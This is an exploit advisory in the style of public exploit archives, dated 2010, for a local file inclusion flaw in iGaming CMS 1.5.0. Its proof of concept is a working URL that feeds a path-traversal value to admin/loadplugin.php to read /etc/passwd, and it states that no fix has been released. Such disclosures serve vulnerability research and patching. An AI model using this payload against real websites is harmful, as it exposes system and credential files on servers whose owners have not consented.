iGaming CMS 1.5.0 Local File Inclusion Vulnerability

# Exploit Title: iGaming CMS 1.5.0 Local File Inclusion Vulnerability
# Date: 24-10-2010 
# Author: ZonTa
# Mail: zontahackers[at]gmail[dot]com 
# IM :  zontahackers[at]live[dot]com

# Software Link:    http://www.igamingcms.com/downloads.php
# Version: 1.5.0
# Tested on: Apache,PHP5,Linux


ABOUT iGaming CMS 
--------------

Gaming CMS is a content management system designed
for gaming websites. The system is written in PHP
and requires a Mysql database for operation.


POC
--------------

http://<host>/<path>/admin/loadplugin.php?load=<file>

Example : 

http://192.168.1.2/iGamingCMS1.5/admin/loadplugin.php?load=../../../../etc/passwd


FIX
--------------

Not yet released.


Greetz to Sri Lankanz ~